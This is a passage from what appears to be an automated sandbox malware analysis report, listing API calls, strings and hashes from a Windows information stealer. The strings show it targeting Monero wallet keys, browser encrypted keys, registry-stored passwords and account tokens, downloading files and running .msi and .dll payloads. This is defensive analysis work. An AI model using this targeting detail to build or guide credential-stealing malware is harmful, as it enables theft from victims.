                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: b4f22980d4fd993d62a1a64bceca3a990954b878a41b6912f20d79c2437f337e
                            • Instruction ID: 61a7f46d67ea1f3c57be165e26a5e2b12bc3a992db622e94f70dc100c6d37a0d
                            • Opcode Fuzzy Hash: b4f22980d4fd993d62a1a64bceca3a990954b878a41b6912f20d79c2437f337e
                            • Instruction Fuzzy Hash: 84122D7280010C9BDB18EBA0DE96FEDB7B8AF14304F48516DE50676191EF362B4BCB61
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB6280: InternetOpenA.WININET(00ED0DFE,00000001,00000000,00000000,00000000), ref: 00EB62E1
                              • Part of subcall function 00EB6280: StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6303
                              • Part of subcall function 00EB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB6335
                              • Part of subcall function 00EB6280: HttpOpenRequestA.WININET(00000000,GET,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB6385
                              • Part of subcall function 00EB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EB63BF
                              • Part of subcall function 00EB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB63D1
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EC5318
                            • lstrlen.KERNEL32(00000000), ref: 00EC532F
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00EC5364
                            • lstrlen.KERNEL32(00000000), ref: 00EC5383
                            • lstrlen.KERNEL32(00000000), ref: 00EC53AE
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 94fb2801b7f4cb30220830ef7011915447ea4ec32544eba640f8fb21423b0a69
                            • Instruction ID: 4c72278dcd7af9dd4d883d92ea4ea1515536d2677a83a231b808379b537b99a8
                            • Opcode Fuzzy Hash: 94fb2801b7f4cb30220830ef7011915447ea4ec32544eba640f8fb21423b0a69
                            • Instruction Fuzzy Hash: 7251DB3291014C9BCB18EF60CA96FEE77B9AF50304F54502CE41A7A591DF366B47CB62
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 7aa155491374355df0c5c3a58b9d417a675ea81579a6d888345e71fc6e991fbd
                            • Instruction ID: 748c4ba1597fd083824219f42cc019ac7b33edccfcad39ef256abb72ff5709c4
                            • Opcode Fuzzy Hash: 7aa155491374355df0c5c3a58b9d417a675ea81579a6d888345e71fc6e991fbd
                            • Instruction Fuzzy Hash: DEC1B6B690020D9BCB14EF60DE89FEA73B8BB54304F0445ADF50A77141DA36AA86CF91
                            APIs
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC42EC
                            • lstrcat.KERNEL32(?,00A9DDD0), ref: 00EC430B
                            • lstrcat.KERNEL32(?,?), ref: 00EC431F
                            • lstrcat.KERNEL32(?,00A9C720), ref: 00EC4333
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EC8D90: GetFileAttributesA.KERNEL32(00000000,?,00EB1B54,?,?,00ED564C,?,?,00ED0E1F), ref: 00EC8D9F
                              • Part of subcall function 00EB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EB9D39
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC93C0: GlobalAlloc.KERNEL32(00000000,00EC43DD,00EC43DD), ref: 00EC93D3
                            • StrStrA.SHLWAPI(?,00A9DC20), ref: 00EC43F3
                            • GlobalFree.KERNEL32(?), ref: 00EC4512
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9AEF
                              • Part of subcall function 00EB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B01
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9B2A
                              • Part of subcall function 00EB9AC0: LocalFree.KERNEL32(?,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC44A3
                            • StrCmpCA.SHLWAPI(?,00ED08D1), ref: 00EC44C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EC44D2
                            • lstrcat.KERNEL32(00000000,?), ref: 00EC44E5
                            • lstrcat.KERNEL32(00000000,00ED0FB8), ref: 00EC44F4
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 24becaa923ffe6074aa00f383fbb25241ac1071f19fa0363240608ff65d04df5
                            • Instruction ID: 8f3a41dfab38f3c18ec9cc207ef1983626227d7a799e9a4da7287ca282a72436
                            • Opcode Fuzzy Hash: 24becaa923ffe6074aa00f383fbb25241ac1071f19fa0363240608ff65d04df5
                            • Instruction Fuzzy Hash: 0F718AB6900208A7CB14EBA0DD96FEE73B9BB48304F04559CF609A7181DA76DB46CF51
                            APIs
                              • Part of subcall function 00EB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB12B4
                              • Part of subcall function 00EB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB12BB
                              • Part of subcall function 00EB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EB12D7
                              • Part of subcall function 00EB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EB12F5
                              • Part of subcall function 00EB12A0: RegCloseKey.ADVAPI32(?), ref: 00EB12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 00EB134F
                            • lstrlen.KERNEL32(?), ref: 00EB135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00EB1377
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EB1465
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 00EB14EF
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: e4d14756d5f454f7bd68aeda8ddcc029d81a60a958a567d8b4ec6f9ce58f3977
                            • Instruction ID: 2d2b361b6eedf6fd9affd4b152db44cae70b4ec09ec2077eafb4c31d4b9c52bb
                            • Opcode Fuzzy Hash: e4d14756d5f454f7bd68aeda8ddcc029d81a60a958a567d8b4ec6f9ce58f3977
                            • Instruction Fuzzy Hash: F75154B295021C97CB25EB60DD96FED73BCAB50304F4451ACB60A72081EE316B86CBA5
                            APIs
                              • Part of subcall function 00EB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EB733A
                              • Part of subcall function 00EB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EB73B1
                              • Part of subcall function 00EB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EB740D
                              • Part of subcall function 00EB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EB7452
                              • Part of subcall function 00EB72D0: HeapFree.KERNEL32(00000000), ref: 00EB7459
                            • lstrcat.KERNEL32(00000000,00ED17FC), ref: 00EB7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EB7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 00EB765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EB768F
                            • lstrcat.KERNEL32(00000000,00ED1804), ref: 00EB76A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00EB76D3
                            • lstrcat.KERNEL32(00000000,00ED1808), ref: 00EB76ED
                            • task.LIBCPMTD ref: 00EB76FB
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 0356b1a38665087223409de1614eb070904a99e562ff2b824ea581adb343aff5
                            • Instruction ID: bb6cb12fe6e3ee1485a9fb70cd0039e4c26857c32ad486f0499762debedb0222
                            • Opcode Fuzzy Hash: 0356b1a38665087223409de1614eb070904a99e562ff2b824ea581adb343aff5
                            • Instruction Fuzzy Hash: 07314D72A01109DBCB18EBA4D986DEF73B8AB88301F20511CE146B7685DA39A947CB50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A9D950,00000000,?,00ED0E2C,00000000,?,00000000), ref: 00EC8130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC8137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EC8158
                            • __aulldiv.LIBCMT ref: 00EC8172
                            • __aulldiv.LIBCMT ref: 00EC8180
                            • wsprintfA.USER32 ref: 00EC81AC
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 39a3b53faccda1e7c57659b021975234e0dbfea4bf6991b04f0054842f91d88b
                            • Instruction ID: 7867065bad09f4a682510d70efe2f73f99332048ec48f2c820badce3459c0862
                            • Opcode Fuzzy Hash: 39a3b53faccda1e7c57659b021975234e0dbfea4bf6991b04f0054842f91d88b
                            • Instruction Fuzzy Hash: DA213EB1E44208ABDB10DFD4CE4AFAEB7B8FB44710F10411DF605BB280D77A69028BA5
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                            • InternetOpenA.WININET(00ED0DF7,00000001,00000000,00000000,00000000), ref: 00EB610F
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EB618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EB61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00EB61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EB620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00EB6249
                            • InternetCloseHandle.WININET(?), ref: 00EB6253
                            • InternetCloseHandle.WININET(00000000), ref: 00EB6260
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: ed5048df116d8ba2fcc765f904954d428218747849f83e3e8d0d194ca54e29ed
                            • Instruction ID: c44c9cb2ddb26222cbaa1da4178380fb9a5138921f3d4d6d31c086aba34bf561
                            • Opcode Fuzzy Hash: ed5048df116d8ba2fcc765f904954d428218747849f83e3e8d0d194ca54e29ed
                            • Instruction Fuzzy Hash: E3513EB1A00218ABEB20DF50DD49FEE77B8FB44705F109098A609B71C1DB796A85CF95
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EB733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EB73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EB740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00EB7452
                            • HeapFree.KERNEL32(00000000), ref: 00EB7459
                            • task.LIBCPMTD ref: 00EB7555
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: f19263882837107351292be099df061cdca2a9cdee0628a95fba0b07d761bfbc
                            • Instruction ID: f175061ff1ad31b22543825af2c73b1b3bf6f3804db7dfcf8f089c468bd251ca
                            • Opcode Fuzzy Hash: f19263882837107351292be099df061cdca2a9cdee0628a95fba0b07d761bfbc
                            • Instruction Fuzzy Hash: D1614BB19042589BDB24DF50DD41BDAB7BCBF44344F0091E9E689B6641DBB06BC9CFA0
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            • lstrlen.KERNEL32(00000000), ref: 00EBBC9F
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 00EBBCCD
                            • lstrlen.KERNEL32(00000000), ref: 00EBBDA5
                            • lstrlen.KERNEL32(00000000), ref: 00EBBDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 47395ca61124e23b70b90429b75f8ed1d50389c7e673f240e7fd8b0f4c473cc9
                            • Instruction ID: 0dffc598b5747e125bedb63290e62dfb4ba877f029a7bcfd44e2480cc4b27f28
                            • Opcode Fuzzy Hash: 47395ca61124e23b70b90429b75f8ed1d50389c7e673f240e7fd8b0f4c473cc9
                            • Instruction Fuzzy Hash: 19B1517291010C9BCB18EBA0DE96FEE73B8AF54304F44516DF506B3191EF356A4ACB62
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 2a68ce0eb956bfbf9d1e79805ca938467e902545153d68d186b46d90ad1ea568
                            • Instruction ID: c86869edc3c5faa4c27c32e19545bdfc896befc5674702ca2c0b6af15443a122
                            • Opcode Fuzzy Hash: 2a68ce0eb956bfbf9d1e79805ca938467e902545153d68d186b46d90ad1ea568
                            • Instruction Fuzzy Hash: D1F09A30A04208EFD3509FE0A90AF6C7B70FB04702F04019DE24A97A84D67A5A428BD1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EB4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB4FD1
                            • InternetOpenA.WININET(00ED0DDF,00000000,00000000,00000000,00000000), ref: 00EB4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EB5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EB5041
                            • InternetCloseHandle.WININET(?), ref: 00EB50B9
                            • InternetCloseHandle.WININET(?), ref: 00EB50C6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: f2ecc6c93146eb6746f1666efbd35621c590dae693242f85c92bb920ac43b007
                            • Instruction ID: 61f1c788b06fedcb3da3f48e24bab1519e8948f767b7364ab823a3616486de6d
                            • Opcode Fuzzy Hash: f2ecc6c93146eb6746f1666efbd35621c590dae693242f85c92bb920ac43b007
                            • Instruction Fuzzy Hash: F53104B5A00218EBDB20DF54DC85BDDB7B4FB48704F1081D9EA09B7280D7756E858FA8
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EC8426
                            • wsprintfA.USER32 ref: 00EC8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EC847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC8499
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            • RegQueryValueExA.ADVAPI32(00000000,00A9DB18,00000000,000F003F,?,00000400), ref: 00EC84EC
                            • lstrlen.KERNEL32(?), ref: 00EC8501
                            • RegQueryValueExA.ADVAPI32(00000000,00A9D938,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00ED0B34), ref: 00EC8599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC8608
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 9a83ffbbef5c978ee7f6df920e1ce1c469f16e885bbd48b16236c92f299a2288
